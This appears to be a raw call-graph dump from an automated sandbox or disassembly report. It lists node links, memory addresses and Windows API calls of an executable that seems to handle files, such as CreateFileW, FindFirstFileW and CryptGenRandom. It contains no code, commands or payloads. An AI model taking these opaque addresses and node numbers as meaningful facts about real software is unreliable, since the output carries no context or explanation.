7ff60e5e5708 237 API calls 38407->38410 38408->38350 38408->38352 38408->38353 38408->38360 38408->38367 38408->38387 38409 7ff60e5d8444 54 API calls 38408->38409 38408->38410 38409->38408 38410->38346 38410->38351 38410->38361 38410->38369 38410->38372 38410->38374 38410->38375 38410->38376 38410->38379 38410->38383 38410->38384 38410->38385 38410->38388 38410->38392 38410->38394 38410->38395 38410->38396 38410->38397 38410->38398 38410->38399 38410->38400 38410->38401 38410->38402 38410->38403 38410->38404 38410->38405 38410->38406 38410->38407 38410->38408 38413 7ff60e5ea250 237 API calls 38410->38413 38414 7ff60e5eaae0 237 API calls 38410->38414 38415 7ff60e5d0d60 237 API calls 38410->38415 38411->38347 38412->38341 38413->38410 38414->38408 38415->38408 38417 7ff60e5f34f6 38416->38417 38418 7ff60e5c1893 38417->38418 38484 7ff60e60dac0 CompareStringW 38417->38484 38418->38287 38418->38298 38421 7ff60e5c546f setbuf 38420->38421 38423 7ff60e5c554a __scrt_fastfail 38421->38423 38438 7ff60e5c5588 __scrt_fastfail 38421->38438 38525 7ff60e60c0a8 GetSystemTime SystemTimeToFileTime 38423->38525 38425 7ff60e5c5583 38514 7ff60e5c6eb8 38425->38514 38429 7ff60e5c681c 54 API calls 38429->38425 38430 7ff60e5c56e9 38521 7ff60e606f68 38430->38521 38432 7ff60e5c56f6 38433 7ff60e61a610 _handle_error 8 API calls 38432->38433 38434 7ff60e5c19df 38433->38434 38440 7ff60e5c72c4 38434->38440 38438->38425 38485 7ff60e5c3210 38438->38485 38491 7ff60e5d7088 38438->38491 38495 7ff60e5c681c 38438->38495 38506 7ff60e607a24 38438->38506 38528 7ff60e5c571c 38438->38528 38536 7ff60e5d4380 14 API calls 38438->38536 38441 7ff60e5c72eb 38440->38441 38676 7ff60e5d88dc 38441->38676 38443 7ff60e5c7302 38680 7ff60e5f915c 38443->38680 38445 7ff60e5c730f 38692 7ff60e5f7044 38445->38692 38448 7ff60e61a444 new 4 API calls 38449 7ff60e5c73e3 38448->38449 38451 7ff60e5c73f5 __scrt_fastfail 38449->38451 38708 7ff60e5e894c 38449->38708 38697 7ff60e5d9be0 38451->38697 38455 7ff60e5c7539 38454->38455 38801 7ff60e5f922c 38455->38801 38459 7ff60e5d6d45 38458->38459 38460 7ff60e5d6cbc 38458->38460 38461 7ff60e5d6d83 38459->38461 38463 7ff60e5d6d69 38459->38463 38820 7ff60e5f9f78 8 API calls 2 library calls 38459->38820 38462 7ff60e5d6cd9 38460->38462 38815 7ff60e5f9f78 8 API calls 2 library calls 38460->38815 38461->38318 38465 7ff60e5d6cf3 38462->38465 38816 7ff60e5f9f78 8 API calls 2 library calls 38462->38816 38463->38461 38821 7ff60e5f9f78 8 API calls 2 library calls 38463->38821 38468 7ff60e5d6d0d 38465->38468 38817 7ff60e5f9f78 8 API calls 2 library calls 38465->38817 38472 7ff60e5d6d2b 38468->38472 38818 7ff60e5f9f78 8 API calls 2 library calls 38468->38818 38472->38461 38819 7ff60e5f9f78 8 API calls 2 library calls 38472->38819 38475 7ff60e5c7162 38474->38475 38476 7ff60e5c7167 38474->38476 38822 7ff60e5c6c64 130 API calls _handle_error 38475->38822 38478->38295 38479->38288 38480->38290 38481->38296 38482->38301 38483->38299 38484->38418 38486 7ff60e5c32e9 38485->38486 38487 7ff60e5c3231 38485->38487 38486->38438 38487->38486 38537 7ff60e5d4380 14 API calls 38487->38537 38489 7ff60e5c329c 38489->38486 38538 7ff60e5e2a20 22 API calls 2 library calls 38489->38538 38493 7ff60e5d70a4 38491->38493 38492 7ff60e5d70c5 38492->38438 38493->38492 38539 7ff60e5e8558 10 API calls 2 library calls 38493->38539 38540 7ff60e5c6714 38495->38540 38497 7ff60e5c6836 38498 7ff60e5c6853 38497->38498 38551 7ff60e6248c0 38497->38551 38498->38438 38501 7ff60e5c68a9 std::bad_alloc::bad_alloc 38559 7ff60e61ba34 RtlPcToFileHeader RaiseException 38501->38559 38503 7ff60e5c68c4 38560 7ff60e5c7188 12 API calls 38503->38560 38505 7ff60e5c68eb 38505->38438 38508 7ff60e607a59 38506->38508 38512 7ff60e607a4f 38506->38512 38507 7ff60e607b1c 60 API calls 38507->38508 38508->38507 38509 7ff60e607a7c 38508->38509 38508->38512 38567 7ff60e6071fc 38508->38567 38600 7ff60e5d41b0 14 API calls 2 library calls 38508->38600 38599 7ff60e60b6d0 73 API calls _Init_thread_footer 38509->38599 38512->38438 38515 7ff60e5c6ee6 38514->38515 38520 7ff60e5c6f5c 38514->38520 38665 7ff60e609f64 8 API calls __BuildCatchObjectHelper 38515->38665 38517 7ff60e5c6efb 38518 7ff60e5c6f2f 38517->38518 38517->38520 38518->38517 38666 7ff60e5c7188 12 API calls 38518->38666 38520->38430 38520->38520 38522 7ff60e606fb4 38521->38522 38524 7ff60e606f8a 38521->38524 38523 7ff60e5e4538 FindClose 38523->38524 38524->38522 38524->38523 38526 7ff60e61a610 _handle_error 8 API calls 38525->38526 38527 7ff60e5c5576 38526->38527 38527->38429 38529 7ff60e5c5742 38528->38529 38532 7ff60e5c575d 38528->38532 38529->38532 38671 7ff60e5f3520 12 API calls 2 library calls 38529->38671 38667 7ff60e5f3610 38532->38667 38534 7ff60e5c57fc 38534->38438 38536->38438 38537->38489 38538->38486 38539->38493 38541 7ff60e5c6738 38540->38541 38550 7ff60e5c67a7 __BuildCatchObjectHelper 38540->38550 38542 7ff60e5c6765 38541->38542 38561 7ff60e5dca6c 48 API calls 3 library calls 38541->38561 38546 7ff60e5c67e1 38542->38546 38547 7ff60e5c6786 38542->38547 38544 7ff60e5c6759 38562 7ff60e5dcb64 8 API calls 38544->38562 38546->38550 38564 7ff60e5dcb64 8 API calls 38546->38564 38547->38550 38563 7ff60e5dcb64 8 API calls 38547->38563 38550->38497 38552 7ff60e6248f5 38551->38552 38555 7ff60e5c684b 38551->38555 38552->38555 38565 7ff60e627094 31 API calls 2 library calls 38552->38565 38554 7ff60e624924 38554->38555 38556 7ff60e62492d 38554->38556 38555->38498 38555->38501 38566 7ff60e624e3c 16 API calls abort 38556->38566 38559->38503 38560->38505 38561->38544 38565->38554 38573 7ff60e607217 setbuf 38567->38573 38568 7ff60e6073c5 38607 7ff60e5e45cc 38568->38607 38569 7ff60e61a610 _handle_error 8 API calls 38571 7ff60e60776f 38569->38571 38571->38508 38573->38568 38582 7ff60e60729c 38573->38582 38593 7ff60e60725a 38573->38593 38614 7ff60e5e4554 38573->38614 38574 7ff60e607453 38577 7ff60e607464 38574->38577 38578 7ff60e607476 38574->38578 38576 7ff60e6076ef 38576->38593 38625 7ff60e5e8558 10 API calls 2 library calls 38576->38625 38622 7ff60e607c38 55 API calls 3 library calls 38577->38622 38595 7ff60e607496 38578->38595 38611 7ff60e5e4538 38578->38611 38580 7ff60e607471 38580->38578 38585 7ff60e6073bb 38582->38585 38587 7ff60e60732e 38582->38587 38584 7ff60e607342 38584->38576 38584->38593 38597 7ff60e607656 38584->38597 38623 7ff60e5d4380 14 API calls 38584->38623 38601 7ff60e61a444 38585->38601 38587->38584 38589 7ff60e60734a 38587->38589 38590 7ff60e60737e 38589->38590 38589->38593 38620 7ff60e5d4380 14 API calls 38589->38620 38590->38593 38621 7ff60e5dcbd0 75 API calls 38590->38621 38591 7ff60e5e4554 16 API calls 38591->38593 38593->38569 38595->38591 38595->38593 38596 7ff60e607723 38624 7ff60e5cc214 8 API calls 2 library calls 38596->38624 38597->38576 38597->38593 38597->38596 38600->38508 38604 7ff60e61a44f 38601->38604 38602 7ff60e61a47a 38602->38568 38604->38602 38626 7ff60e6236c0 38604->38626 38629 7ff60e61b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38604->38629 38630 7ff60e61b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38604->38630 38610 7ff60e5e45ed 38607->38610 38608 7ff60e5e46b2 38608->38574 38608->38584 38609 7ff60e5e46ec 15 API calls 38609->38610 38610->38608 38610->38609 38612 7ff60e5e454f 38611->38612 38613 7ff60e5e4549 FindClose 38611->38613 38612->38595 38613->38612 38616 7ff60e5e4570 38614->38616 38615 7ff60e5e4574 38615->38582 38616->38615 38637 7ff60e5e46ec 38616->38637 38619 7ff60e5e458d FindClose 38619->38615 38620->38590 38621->38593 38622->38580 38623->38597 38624->38593 38625->38593 38631 7ff60e623700 38626->38631 38636 7ff60e626938 EnterCriticalSection 38631->38636 38633 7ff60e62370d 38634 7ff60e626998 abort LeaveCriticalSection 38633->38634 38635 7ff60e6236d2 38634->38635 38635->38604 38638 7ff60e5e4705 setbuf 38637->38638 38639 7ff60e5e4733 FindFirstFileW 38638->38639 38640 7ff60e5e47a4 FindNextFileW 38638->38640 38641 7ff60e5e4749 38639->38641 38649 7ff60e5e478b 38639->38649 38642 7ff60e5e47ae GetLastError 38640->38642 38640->38649 38650 7ff60e5f4534 38641->38650 38642->38649 38645 7ff60e61a610 _handle_error 8 API calls 38648 7ff60e5e4587 38645->38648 38646 7ff60e5e475f FindFirstFileW 38647 7ff60e5e477a GetLastError 38646->38647 38646->38649 38647->38649 38648->38615 38648->38619 38649->38645 38651 7ff60e5f4549 setbuf 38650->38651 38661 7ff60e5f45a2 38651->38661 38662 7ff60e5f472c CharUpperW 38651->38662 38653 7ff60e5f4579 38663 7ff60e5f4760 CharUpperW 38653->38663 38654 7ff60e61a610 _handle_error 8 API calls 38655 7ff60e5e475b 38654->38655 38655->38646 38655->38647 38657 7ff60e5f4592 38658 7ff60e5f459a 38657->38658 38659 7ff60e5f4629 GetCurrentDirectoryW 38657->38659 38664 7ff60e5f472c CharUpperW 38658->38664 38659->38661 38661->38654 38662->38653 38663->38657 38664->38661 38665->38517 38666->38518 38670 7ff60e5f3626 setbuf wcschr 38667->38670 38668 7ff60e61a610 _handle_error 8 API calls 38669 7ff60e5c57e1 38668->38669 38669->38534 38672 7ff60e5f48bc 38669->38672 38670->38668 38671->38532 38673 7ff60e5f48cb setbuf 38672->38673 38674 7ff60e61a610 _handle_error 8 API calls 38673->38674 38675 7ff60e5f493a 38674->38675 38675->38534 38677 7ff60e5d8919 38676->38677 38713 7ff60e604b14 38677->38713 38679 7ff60e5d8954 __scrt_fastfail 38679->38443 38681 7ff60e5f9199 38680->38681 38718 7ff60e61a480 38681->38718 38684 7ff60e61a444 new 4 API calls 38685 7ff60e5f91cf 38684->38685 38686 7ff60e5f91e1 38685->38686 38687 7ff60e5d88dc 8 API calls 38685->38687 38688 7ff60e61a444 new 4 API calls 38686->38688 38687->38686 38689 7ff60e5f91f7 38688->38689 38690 7ff60e5f9209 38689->38690 38691 7ff60e5d88dc 8 API calls 38689->38691 38690->38445 38691->38690 38693 7ff60e5d88dc 8 API calls 38692->38693 38694 7ff60e5f7063 38693->38694 38726 7ff60e5f72c0 38694->38726 38730 7ff60e5d901c CryptAcquireContextW 38697->38730 38701 7ff60e5d9c2a 38740 7ff60e609ce4 38701->38740 38705 7ff60e5d9c5b __BuildCatchObjectHelper 38706 7ff60e61a610 _handle_error 8 API calls 38705->38706 38707 7ff60e5c1a01 38706->38707 38707->38307 38757 7ff60e607d80 38708->38757 38714 7ff60e604b2b 38713->38714 38715 7ff60e604b26 38713->38715 38714->38679 38717 7ff60e604b38 8 API calls _handle_error 38715->38717 38717->38714 38723 7ff60e61a444 38718->38723 38719 7ff60e5f91be 38719->38684 38720 7ff60e6236c0 new 2 API calls 38720->38723 38723->38719 38723->38720 38724 7ff60e61b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38723->38724 38725 7ff60e61b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38723->38725 38727 7ff60e5f72dd 38726->38727 38728 7ff60e61a480 4 API calls 38727->38728 38729 7ff60e5c7325 38727->38729 38728->38729 38729->38448 38729->38451 38731 7ff60e5d907e 38730->38731 38732 7ff60e5d9057 CryptGenRandom CryptReleaseContext 38730->38732 38734 7ff60e5d9c9c 11 API calls 38731->38734 38732->38731 38733 7ff60e5d9089 38732->38733 38735 7ff60e5d9c9c 38733->38735 38734->38733 38736 7ff60e60c0a8 10 API calls 38735->38736 38737 7ff60e5d9cc5 38736->38737 38750 7ff60e622d74 38737->38750 38741 7ff60e5d9c49 38740->38741 38742 7ff60e609d15 __BuildCatchObjectHelper 38740->38742 38744 7ff60e609b70 38741->38744 38742->38741 38753 7ff60e609d74 38742->38753 38746 7ff60e609bad __scrt_fastfail 38744->38746 38747 7ff60e609bd9 __scrt_fastfail 38744->38747 38745 7ff60e609d74 8 API calls 38748 7ff60e609c07 38745->38748 38746->38747 38749 7ff60e609d74 8 API calls 38746->38749 38747->38745 38748->38705 38749->38747 38751 7ff60e622d8b QueryPerformanceCounter 38750->38751 38752 7ff60e5d9cd7 38750->38752 38751->38752 38752->38701 38754 7ff60e609dbc 38753->38754 38754->38754 38755 7ff60e61a610 _handle_error 8 API calls 38754->38755 38756 7ff60e609f40 38755->38756 38756->38742 38764 7ff60e608094 38757->38764 38760 7ff60e5e8a44 38761 7ff60e5e8a5a __scrt_fastfail 38760->38761 38796 7ff60e60bac4 38761->38796 38765 7ff60e60809f 38764->38765 38768 7ff60e607ec8 38765->38768 38770 7ff60e607efa __BuildCatchObjectHelper 38768->38770 38769 7ff60e607fb5 38773 7ff60e60805c GetCurrentProcessId 38769->38773 38774 7ff60e607ff1 38769->38774 38770->38769 38782 7ff60e60b3f0 38770->38782 38776 7ff60e5e896e 38773->38776 38774->38776 38791 7ff60e5dca6c 48 API calls 3 library calls 38774->38791 38775 7ff60e607f7e GetProcAddressForCaller GetProcAddress 38775->38769 38776->38760 38778 7ff60e60801f 38792 7ff60e5dcda4 10 API calls 2 library calls 38778->38792 38780 7ff60e608027 38793 7ff60e5dca40 61 API calls _CxxThrowException 38780->38793 38794 7ff60e61a5a0 38782->38794 38785 7ff60e60b428 38789 7ff60e61a610 _handle_error 8 API calls 38785->38789 38786 7ff60e60b42c 38787 7ff60e5f48bc 8 API calls 38786->38787 38788 7ff60e60b444 LoadLibraryExW 38787->38788 38788->38785 38790 7ff60e607f72 38789->38790 38790->38769 38790->38775 38791->38778 38792->38780 38793->38776 38795 7ff60e60b3fc GetSystemDirectoryW 38794->38795 38795->38785 38795->38786 38799 7ff60e60ba70 GetCurrentProcess GetProcessAffinityMask 38796->38799 38800 7ff60e5e89c5 38799->38800 38800->38451 38803 7ff60e5f9245 38801->38803 38809 7ff60e5e6194 38803->38809 38804 7ff60e5f92b1 38805 7ff60e5e6194 72 API calls 38804->38805 38806 7ff60e5f92bd 38805->38806 38807 7ff60e5e6194 72 API calls 38806->38807 38808 7ff60e5f92c9 38807->38808 38810 7ff60e5e61b4 38809->38810 38813 7ff60e5e61cb 38809->38813 38814 7ff60e60b850 72 API calls 38810->38814 38813->38804 38815->38462 38816->38465 38817->38468 38818->38472 38819->38459 38820->38463 38821->38461 38822->38476 38823 7ff60e5c3b53 38824 7ff60e5c3b64 38823->38824 38873 7ff60e5e1e80 38824->38873 38825 7ff60e5c3bb6 38828 7ff60e5c3c01 38825->38828 38831 7ff60e5c3c18 38825->38831 38833 7ff60e5c3c09 38825->38833 38827 7ff60e5c3ccc 38855 7ff60e5c3c90 38827->38855 38903 7ff60e5e2414 61 API calls 38827->38903 38890 7ff60e5e1c24 38828->38890 38895 7ff60e5c8050 157 API calls 38831->38895 38832 7ff60e5c3c3d 38896 7ff60e5c8010 13 API calls 38832->38896 38885 7ff60e5e23f0 38833->38885 38836 7ff60e5c3c45 38839 7ff60e5c3c54 38836->38839 38897 7ff60e5dcba8 75 API calls 38836->38897 38838 7ff60e5c3cf9 38904 7ff60e5e1998 138 API calls 38838->38904 38898 7ff60e5ca9d4 186 API calls wcschr 38839->38898 38843 7ff60e5c3c5c 38899 7ff60e5c93ac 8 API calls 38843->38899 38844 7ff60e5c3d10 38905 7ff60e5e18ac 38844->38905 38847 7ff60e5c3c66 38849 7ff60e5c3c77 38847->38849 38900 7ff60e5dca40 61 API calls _CxxThrowException 38847->38900 38901 7ff60e5c8090 8 API calls 38849->38901 38852 7ff60e5c3c7f 38852->38855 38902 7ff60e5dca40 61 API calls _CxxThrowException 38852->38902 38912 7ff60e60d400 48 API calls 38855->38912 38875 7ff60e5e1e95 setbuf 38873->38875 38874 7ff60e5e1ecb CreateFileW 38876 7ff60e5e1fb8 38874->38876 38877 7ff60e5e1f59 GetLastError 38874->38877 38875->38874 38879 7ff60e5e1ff7 38876->38879 38881 7ff60e5e1fd9 SetFileTime 38876->38881 38878 7ff60e5f4534 10 API calls 38877->38878 38880 7ff60e5e1f74 38878->38880 38882 7ff60e61a610 _handle_error 8 API calls 38879->38882 38880->38876 38883 7ff60e5e1f78 CreateFileW GetLastError 38880->38883 38881->38879 38884 7ff60e5e203a 38882->38884 38883->38876 38884->38825 38913 7ff60e5e24e8 38885->38913 38888 7ff60e5e240e 38888->38827 38891 7ff60e5e1c37 38890->38891 38894 7ff60e5e1c3b 38890->38894 38891->38833 38892 7ff60e5e1c5d 38930 7ff60e5e2d6c 12 API calls 2 library calls 38892->38930 38894->38891 38894->38892 38895->38832 38896->38836 38898->38843 38899->38847 38900->38849 38901->38852 38902->38855 38903->38838 38904->38844 38906 7ff60e5e18ca 38905->38906 38911 7ff60e5e18db 38905->38911 38907 7ff60e5e18de 38906->38907 38908 7ff60e5e18d6 38906->38908 38906->38911 38931 7ff60e5e1930 38907->38931 38909 7ff60e5e1c24 12 API calls 38908->38909 38909->38911 38911->38855 38919 7ff60e5e1af0 38913->38919 38916 7ff60e5e23f9 38916->38888 38918 7ff60e5dca40 61 API calls _CxxThrowException 38916->38918 38918->38888 38920 7ff60e5e1b01 setbuf 38919->38920 38921 7ff60e5e1b6f CreateFileW 38920->38921 38922 7ff60e5e1b68 38920->38922 38921->38922 38923 7ff60e5e1be1 38922->38923 38924 7ff60e5f4534 10 API calls 38922->38924 38927 7ff60e61a610 _handle_error 8 API calls 38923->38927 38925 7ff60e5e1bb3 38924->38925 38925->38923 38926 7ff60e5e1bb7 CreateFileW 38925->38926 38926->38923 38928 7ff60e5e1c14 38927->38928 38928->38916 38929 7ff60e5dca08 10 API calls 38928->38929 38929->38916 38930->38891 38932 7ff60e5e194c 38931->38932 38934 7ff60e5e1964 38931->38934 38932->38934 38935 7ff60e5e1958 CloseHandle 38932->38935 38933 7ff60e5e1988 38933->38911 38934->38933 38937 7ff60e5dc9d0 10 API calls 38934->38937 38935->38934 38937->38933 38938 7ff60e5c82f0 38939 7ff60e5c8306 38938->38939 38952 7ff60e5c836f 38938->38952 38940 7ff60e5c8324 38939->38940 38943 7ff60e5c8371 38939->38943 38939->38952 39058 7ff60e5e2414 61 API calls 38940->39058 38942 7ff60e5c8347 39059 7ff60e5e1998 138 API calls 38942->39059 38943->38952 39060 7ff60e5e1998 138 API calls 38943->39060 38946 7ff60e5c835e 38947 7ff60e5e18ac 15 API calls 38946->38947 38947->38952 38951 7ff60e5c8578 38953 7ff60e5cb540 147 API calls 38951->38953 38961 7ff60e5ca410 38952->38961 38957 7ff60e5c858f 38953->38957 38954 7ff60e5cb540 147 API calls 38954->38951 38955 7ff60e61a610 _handle_error 8 API calls 38956 7ff60e5c8663 38955->38956 38959 7ff60e5c8634 38957->38959 39061 7ff60e5c9628 175 API calls 38957->39061 38959->38955 39062 7ff60e5f7a68 38961->39062 38964 7ff60e5c853a 38966 7ff60e5cb540 38964->38966 38967 7ff60e5cb55f setbuf 38966->38967 38971 7ff60e5cb5a1 38967->38971 39092 7ff60e5ca4d0 38967->39092 38968 7ff60e5cb5b8 39096 7ff60e5caba0 38968->39096 38970 7ff60e5cb5d8 39210 7ff60e5f8c1c 38970->39210 38971->38968 38971->38970 38973 7ff60e61a610 _handle_error 8 API calls 38974 7ff60e5c854f 38973->38974 38974->38951 38974->38954 38975 7ff60e5cb67f 38976 7ff60e5cbc91 38975->38976 38977 7ff60e5cb6a5 38975->38977 38978 7ff60e5cbbae 38975->38978 38980 7ff60e5e2574 126 API calls 38976->38980 39056 7ff60e5cb5d3 38976->39056 38989 7ff60e5cb6b5 38977->38989 39007 7ff60e5cb79f 38977->39007 38977->39056 38981 7ff60e5f8d00 48 API calls 38978->38981 38980->39056 38983 7ff60e5cbc5c 38981->38983 39279 7ff60e5f8d38 48 API calls 38983->39279 38987 7ff60e5cbc69 39280 7ff60e5f8d38 48 API calls 38987->39280 38989->39056 39244 7ff60e5f8d00 38989->39244 38990 7ff60e5cbc76 39281 7ff60e5f8d38 48 API calls 38990->39281 38992 7ff60e5cbc84 39282 7ff60e5f8d88 48 API calls 38992->39282 38997 7ff60e5cb726 39248 7ff60e5f8d38 48 API calls 38997->39248 38999 7ff60e5cb733 39000 7ff60e5cb749 38999->39000 39249 7ff60e5f8d88 48 API calls 38999->39249 39002 7ff60e5cb75c 39000->39002 39250 7ff60e5f8d38 48 API calls 39000->39250 39003 7ff60e5cb779 39002->39003 39006 7ff60e5f8d00 48 API calls 39002->39006 39251 7ff60e5f8f94 39003->39251 39006->39002 39008 7ff60e5cb8e5 39007->39008 39261 7ff60e5cc3c8 CharLowerW CharUpperW 39007->39261 39262 7ff60e60d840 WideCharToMultiByte 39008->39262 39012 7ff60e5cb9a1 39015 7ff60e5f8d00 48 API calls 39012->39015 39013 7ff60e5cb910 39013->39012 39264 7ff60e5c945c 55 API calls _handle_error 39013->39264 39016 7ff60e5cb9c4 39015->39016 39265 7ff60e5f8d38 48 API calls 39016->39265 39018 7ff60e5cb9d1 39266 7ff60e5f8d38 48 API calls 39018->39266 39020 7ff60e5cb9de 39267 7ff60e5f8d88 48 API calls 39020->39267 39022 7ff60e5cb9eb 39268 7ff60e5f8d88 48 API calls 39022->39268 39024 7ff60e5cba0b 39025 7ff60e5f8d00 48 API calls 39024->39025 39026 7ff60e5cba27 39025->39026 39269 7ff60e5f8d88 48 API calls 39026->39269 39028 7ff60e5cba37 39029 7ff60e5cba49 39028->39029 39270 7ff60e60bc48 15 API calls 39028->39270 39271 7ff60e5f8d88 48 API calls 39029->39271 39032 7ff60e5cba59 39033 7ff60e5f8d00 48 API calls 39032->39033 39034 7ff60e5cba66 39033->39034 39035 7ff60e5f8d00 48 API calls 39034->39035 39036 7ff60e5cba78 39035->39036 39272 7ff60e5f8d38 48 API calls 39036->39272 39038 7ff60e5cba85 39273 7ff60e5f8d88 48 API calls 39038->39273 39040 7ff60e5cba92 39041 7ff60e5cbacd 39040->39041 39274 7ff60e5f8d88 48 API calls 39040->39274 39276 7ff60e5f8e3c 39041->39276 39044 7ff60e5cbab2 39275 7ff60e5f8d88 48 API calls 39044->39275 39046 7ff60e5cbb33 39049 7ff60e5cbb53 39046->39049 39053 7ff60e5f8e3c 48 API calls 39046->39053 39048 7ff60e5f8d00 48 API calls 39051 7ff60e5cbb09 39048->39051 39050 7ff60e5cbb6e 39049->39050 39054 7ff60e5f8e3c 48 API calls 39049->39054 39055 7ff60e5f8f94 126 API calls 39050->39055 39051->39046 39052 7ff60e5f8e3c 48 API calls 39051->39052 39052->39046 39053->39049 39054->39050 39055->39056 39056->38973 39058->38942 39059->38946 39060->38952 39061->38959 39064 7ff60e5f7a8d 39062->39064 39069 7ff60e5ca434 39062->39069 39063 7ff60e5f7aaf 39066 7ff60e5e22e0 12 API calls 39063->39066 39063->39069 39064->39063 39075 7ff60e5f7340 157 API calls 39064->39075 39067 7ff60e5f7adf 39066->39067 39076 7ff60e5e2440 39067->39076 39069->38964 39070 7ff60e5e22e0 39069->39070 39086 7ff60e5e20b4 39070->39086 39073 7ff60e5e2307 39073->38964 39075->39063 39077 7ff60e5e246a SetFilePointer 39076->39077 39079 7ff60e5e2454 39076->39079 39078 7ff60e5e24ad 39077->39078 39080 7ff60e5e248d GetLastError 39077->39080 39078->39069 39079->39078 39084 7ff60e5dcd00 10 API calls 39079->39084 39080->39078 39081 7ff60e5e2497 39080->39081 39081->39078 39085 7ff60e5dcd00 10 API calls 39081->39085 39087 7ff60e5e2130 39086->39087 39090 7ff60e5e20d0 39086->39090 39087->39073 39091 7ff60e5dcd00 10 API calls 39087->39091 39088 7ff60e5e2102 SetFilePointer 39088->39087 39089 7ff60e5e2126 GetLastError 39088->39089 39089->39087 39090->39088 39093 7ff60e5ca4ea 39092->39093 39094 7ff60e5e2440 12 API calls 39093->39094 39095 7ff60e5ca4ee 39093->39095 39094->39095 39095->38971 39097 7ff60e5cabbf setbuf 39096->39097 39098 7ff60e5f8c1c 48 API calls 39097->39098 39105 7ff60e5cabf5 39098->39105 39099 7ff60e5caca7 39100 7ff60e5cb4af 39099->39100 39101 7ff60e5cacbf 39099->39101 39102 7ff60e5cb4ff 39100->39102 39106 7ff60e5e2574 126 API calls 39100->39106 39103 7ff60e5cb35c 39101->39103 39104 7ff60e5cacc8 39101->39104 39107 7ff60e5f72c0 4 API calls 39102->39107 39108 7ff60e5f8eec 48 API calls 39103->39108 39112 7ff60e5cacdd 39104->39112 39113 7ff60e5caea7 39104->39113 39116 7ff60e5cad60 39104->39116 39105->39099 39105->39100 39109 7ff60e5d9be0 14 API calls 39105->39109 39106->39102 39107->39116 39111 7ff60e5cb395 39108->39111 39110 7ff60e5cac34 39109->39110 39114 7ff60e5d90b8 75 API calls 39110->39114 39115 7ff60e5cb3ad 39111->39115 39301 7ff60e5c9e2c 48 API calls 39111->39301 39117 7ff60e5cace6 39112->39117 39118 7ff60e5cad68 39112->39118 39152 7ff60e5cafda 39113->39152 39291 7ff60e5c9b64 48 API calls _handle_error 39113->39291 39119 7ff60e5cac8f 39114->39119 39123 7ff60e5f8eec 48 API calls 39115->39123 39122 7ff60e61a610 _handle_error 8 API calls 39116->39122 39117->39116 39283 7ff60e5f8eec 39117->39283 39121 7ff60e5f8eec 48 API calls 39118->39121 39119->39099 39128 7ff60e5e2574 126 API calls 39119->39128 39124 7ff60e5cad9c 39121->39124 39125 7ff60e5cb52b 39122->39125 39126 7ff60e5cb3d4 39123->39126 39129 7ff60e5f8eec 48 API calls 39124->39129 39125->39056 39130 7ff60e5cb3e6 39126->39130 39134 7ff60e5f8eec 48 API calls 39126->39134 39128->39099 39133 7ff60e5cada9 39129->39133 39136 7ff60e5f8eec 48 API calls 39130->39136 39132 7ff60e5f8eec 48 API calls 39135 7ff60e5cad31 39132->39135 39137 7ff60e5f8eec 48 API calls 39133->39137 39134->39130 39138 7ff60e5f8eec 48 API calls 39135->39138 39139 7ff60e5cb451 39136->39139 39140 7ff60e5cadb5 39137->39140 39141 7ff60e5cad46 39138->39141 39142 7ff60e5cb471 39139->39142 39147 7ff60e5f8eec 48 API calls 39139->39147 39143 7ff60e5f8eec 48 API calls 39140->39143 39144 7ff60e5f8f94 126 API calls 39141->39144 39145 7ff60e5cb486 39142->39145 39148 7ff60e5f8e3c 48 API calls 39142->39148 39146 7ff60e5cadc2 39143->39146 39144->39116 39149 7ff60e5f8f94 126 API calls 39145->39149 39150 7ff60e5f8d00 48 API calls 39146->39150 39147->39142 39148->39145 39149->39116 39151 7ff60e5cadcf 39150->39151 39153 7ff60e5d90b8 75 API calls 39151->39153 39163 7ff60e5caff2 39152->39163 39292 7ff60e5c9d98 48 API calls 39152->39292 39155 7ff60e5cae22 39153->39155 39157 7ff60e5f8e3c 48 API calls 39155->39157 39158 7ff60e5cae33 39157->39158 39159 7ff60e5f8e3c 48 API calls 39158->39159 39162 7ff60e5cae48 39159->39162 39160 7ff60e5cb0af 39165 7ff60e5cb0c8 39160->39165 39295 7ff60e5ca1a0 48 API calls 2 library calls 39160->39295 39161 7ff60e5cb02b 39161->39160 39294 7ff60e5ca2c8 48 API calls 39161->39294 39170 7ff60e609ce4 8 API calls 39162->39170 39163->39161 39293 7ff60e5c9efc 48 API calls _handle_error 39163->39293 39168 7ff60e5cb0e2 39165->39168 39296 7ff60e5ca350 48 API calls _handle_error 39165->39296 39172 7ff60e5f8eec 48 API calls 39168->39172 39171 7ff60e5cae60 39170->39171 39173 7ff60e609b70 8 API calls 39171->39173 39174 7ff60e5cb0fc 39172->39174 39176 7ff60e5cae6d 39173->39176 39175 7ff60e5f8eec 48 API calls 39174->39175 39177 7ff60e5cb109 39175->39177 39178 7ff60e5f8e3c 48 API calls 39176->39178 39179 7ff60e5cb11f 39177->39179 39181 7ff60e5f8eec 48 API calls 39177->39181 39180 7ff60e5cae80 39178->39180 39287 7ff60e5f8e94 39179->39287 39183 7ff60e5f8f94 126 API calls 39180->39183 39181->39179 39183->39116 39185 7ff60e5f8eec 48 API calls 39186 7ff60e5cb147 39185->39186 39187 7ff60e5f8e94 48 API calls 39186->39187 39188 7ff60e5cb15f 39187->39188 39189 7ff60e5f8eec 48 API calls 39188->39189 39194 7ff60e5cb16c 39189->39194 39190 7ff60e5cb18a 39191 7ff60e5cb1a9 39190->39191 39298 7ff60e5f8d88 48 API calls 39190->39298 39193 7ff60e5f8e94 48 API calls 39191->39193 39196 7ff60e5cb1bc 39193->39196 39194->39190 39297 7ff60e5f8d88 48 API calls 39194->39297 39197 7ff60e5f8eec 48 API calls 39196->39197 39198 7ff60e5cb1d6 39197->39198 39200 7ff60e5cb1e9 39198->39200 39299 7ff60e5cc3c8 CharLowerW CharUpperW 39198->39299 39200->39200 39201 7ff60e5f8eec 48 API calls 39200->39201 39202 7ff60e5cb21f 39201->39202 39203 7ff60e5f8e3c 48 API calls 39202->39203 39204 7ff60e5cb230 39203->39204 39205 7ff60e5cb247 39204->39205 39206 7ff60e5f8e3c 48 API calls 39204->39206 39207 7ff60e5f8f94 126 API calls 39205->39207 39206->39205 39208 7ff60e5cb278 39207->39208 39208->39116 39300 7ff60e5f70d8 4 API calls 2 library calls 39208->39300 39302 7ff60e5f8f28 39210->39302 39213 7ff60e5d90b8 39214 7ff60e5d9123 